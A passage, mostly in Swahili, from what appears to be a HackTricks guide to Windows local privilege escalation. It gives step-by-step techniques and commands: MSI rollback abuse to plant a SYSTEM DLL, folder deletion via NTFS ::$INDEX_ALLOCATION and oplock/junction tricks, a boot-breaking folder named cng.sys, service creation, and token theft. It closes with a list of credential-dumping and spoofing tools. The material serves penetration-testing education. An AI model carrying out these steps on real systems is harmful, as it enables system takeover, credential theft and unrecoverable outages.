ACLs zinatekelezwa tu wakati handle inafunguliwa, hivyo bado unaweza kuandika kwenye folda.
-
Hatua 11: Drop Fake
.rbsand.rbf -
Ibiyesi faili ya
.rbsna script ya rollback feki ambayo inaelekeza Windows: -
Kurudisha
.rbfyako (DLL yenye madhara) katika eneo lenye mamlaka (mfano,C:\Program Files\Common Files\microsoft shared\ink\HID.DLL). -
Angusha
.rbfyako ya uongo yenye DLL yenye payload ya SYSTEM. -
Hatua 12: Trigger the Rollback
-
Toa ishara ya sync ili installer iendelee.
-
Custom action ya aina 19 (
ErrorOut) imeandaliwa kusababisha usakinishaji kushindwa kwa makusudi mahali maalum. -
Hii inasababisha rollback kuanza.
-
Hatua 13: SYSTEM Installs Your DLL
-
Windows Installer:
-
Inasoma
.rbsyako yenye madhara. -
Inakopia
.rbfDLL yako hadi eneo la lengo. -
Sasa una DLL yako yenye madhara katika njia inayopakiwa na SYSTEM.
-
Hatua ya Mwisho: Execute SYSTEM Code
-
Endesha binary iliyotambulika na auto-elevated (mfano,
osk.exe) ambayo inaload DLL uliyepora. -
Boom: Msimbo wako unatekelezwa kama SYSTEM.
Kutoka Arbitrary File Delete/Move/Rename hadi SYSTEM EoP
Mbinu kuu ya MSI rollback (ile ya hapo juu) inadhani unaweza kufuta folda nzima (mfano, C:\Config.Msi). Lakini vipi ikiwa udhaifu wako unaruhusu tu kufuta faili kiholela?
Unaweza kutumia mambo ya ndani ya NTFS: kila folda ina hidden alternate data stream inayoitwa:
C:\SomeFolder::$INDEX_ALLOCATION
Mtiririko huu unahifadhi metadata ya index ya folda.
Kwa hivyo, ukifuta stream ya ::$INDEX_ALLOCATION ya folda, NTFS huondoa folda nzima kutoka kwenye filesystem.
Unaweza kufanya hivyo kwa kutumia API za kawaida za kufuta faili kama:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Ingawa unaitisha API ya kufuta file, inafuta folder yenyewe.
Kutoka Folder Contents Delete hadi SYSTEM EoP
Je, vipi ikiwa primitive yako hairuhusi kufuta arbitrary files/folders, lakini inaruhusu kufutwa kwa contents ya attacker-controlled folder?
- Hatua 1: Tayarisha folder na file la mtego
- Create:
C:\temp\folder1 - Inside it:
C:\temp\folder1\file1.txt
- Hatua 2: Weka oplock kwenye
file1.txt
- Oplock inasitisha utekelezaji wakati mchakato wenye vibali unajaribu kufuta
file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- Hatua 3: Chochea mchakato wa SYSTEM (mfano,
SilentCleanup)
- Mchakato huu hupitia folda (mfano,
%TEMP%) na kujaribu kufuta yaliyomo ndani yao. - Inapofika kwenye
file1.txt, oplock triggers na inakabidhi udhibiti kwa callback yako.
- Hatua 4: Ndani ya oplock callback – elekeza kufutwa
-
Chaguo A: Hamisha
file1.txtmahali pengine -
Hii itafanya
folder1kuwa tupu bila kuvunja oplock. -
Usifute
file1.txtmoja kwa moja — hilo litaachilia oplock mapema. -
Chaguo B: Geuza
folder1kuwa junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
- Chaguo C: Tengeneza symlink katika
\RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta kunafuta folda.
- Hatua ya 5: Kuachilia oplock
- Mchakato wa SYSTEM unaendelea na kujaribu kufuta
file1.txt. - Lakini sasa, kutokana na junction + symlink, kwa kweli inafanya kufuta:
C:\Config.Msi::$INDEX_ALLOCATION
Matokeo: C:\Config.Msi is deleted by SYSTEM.
Kutoka Arbitrary Folder Create hadi Permanent DoS
Tumia primitive inayokuwezesha create an arbitrary folder as SYSTEM/admin — hata kama huwezi kuandika faili au kuweka ruhusa dhaifu.
Unda kabrasha (sio faili) lenye jina la driver muhimu wa Windows, mfano:
C:\Windows\System32\cng.sys
- Njia hii kwa kawaida inalingana na driver ya kernel-mode
cng.sys. - Ikiwa utaifanya awali kama folda, Windows itashindwa kupakia driver halisi wakati wa boot.
- Kisha, Windows inajaribu kupakia
cng.syswakati wa boot. - Inapoiona folda, inashindwa kutatua driver halisi, na inaanguka au kusimamisha boot.
- Hakuna njia mbadala, na hakuna urejeshaji bila uingiliaji wa nje (kwa mfano, marekebisho ya boot au ufikiaji wa diski).
Kutoka High Integrity hadi System
Huduma mpya
Ikiwa tayari unatekeleza mchakato wa High Integrity, njia hadi SYSTEM inaweza kuwa rahisi kwa tu kuunda na kutekeleza service mpya:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
tip
Wakati unaunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka — itauawa ndani ya 20s ikiwa si service halali.
AlwaysInstallElevated
Kutoka kwenye High Integrity process unaweza kujaribu ku-enable the AlwaysInstallElevated registry entries na install reverse shell ukitumia .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
You can find the code here.
From SeDebug + SeImpersonate to Full Token privileges
Ikiwa una token privileges hizo (huenda utakuta hii katika already High Integrity process), utaweza kufungua almost any process (si protected processes) kwa kutumia SeDebug privilege, copy the token ya process, na ku-create arbitrary process ukiwa na token hiyo.
Kwa kutumia technique hii kawaida huchaguliwa process yoyote inayofanya kazi kama SYSTEM yenye token privileges zote (ndio, unaweza kupata SYSTEM processes bila token privileges zote).
You can find an example of code executing the proposed technique here.
Named Pipes
Teknik hii inatumiwa na meterpreter ku-escalate katika getsystem. Teknik inajumuisha ku-create pipe kisha ku-create/abuse service ili kuandika kwenye pipe hiyo. Kisha, server aliyeunda pipe akitumia SeImpersonate privilege ataweza impersonate token ya pipe client (service) na kupata SYSTEM privileges.
If you want to learn more about name pipes you should read this.
If you want to read an example of how to go from high integrity to System using name pipes you should read this.
Dll Hijacking
Ikiwa utafanikiwa hijack dll inayopakiwa na process inayoendesha kama SYSTEM utaweza execute arbitrary code kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na moreover, ni rahisi zaidi kufikiwa kutoka kwa high integrity process kwani itakuwa na write permissions kwenye folders zinazotumika kupakia dlls.
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Chombo bora kutafuta Windows local privilege escalation vectors: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc(PowerUP) -- Kagua misconfigurations na mafaili nyeti (check here). Imegunduliwa.
JAWS -- Kagua baadhi ya misconfigurations zinazowezekana na kukusanya taarifa (check here).
privesc -- Kagua misconfigurations
SessionGopher -- Inatoa taarifa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP saved sessions. Tumia -Thorough lokali.
Invoke-WCMDump -- Inachota credentials kutoka Credential Manager. Imegunduliwa.
DomainPasswordSpray -- Piga passwords zilizokusanywa katika domain
Inveigh -- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na man-in-the-middle tool.
WindowsEnum -- Uorodheshaji wa msingi wa privesc Windows
Sherlock ~~~~ -- Tafuta privesc vulnerabilities zinazoeleweka (DEPRECATED kwa Watson)
WINspect -- Michoro ya ndani (Inahitaji haki za Admin)
Exe
Watson -- Tafuta privesc vulnerabilities zinazojulikana (inahitaji ku-compile kwa kutumia VisualStudio) (precompiled)
SeatBelt -- Inafanya enumeration ya host kutafuta misconfigurations (zaidi ni tool ya kukusanya taarifa kuliko privesc) (inahitaji ku-compile) (precompiled)
LaZagne -- Inachota credentials kutoka kwa programu nyingi (exe iliyotengenezwa awali kwenye github)
SharpUP -- Port ya PowerUp kwa C#
Beroot ~~~~ -- Kagua misconfiguration (executable imeprecompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.
Windows-Privesc-Check -- Kagua misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.
Bat
winPEASbat -- Tool iliyotengenezwa msingi wa post hii (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia).
Local
Windows-Exploit-Suggester -- Inasoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python za ndani)
Windows Exploit Suggester Next Generation -- Inasoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python za ndani)
Meterpreter
multi/recon/local_exploit_suggestor
You have to compile the project using the correct version of .NET (see this). To see the installed version of .NET on the victim host you can do:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
Marejeleo
-
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
-
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
-
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-
https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
-
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
-
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
-
HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.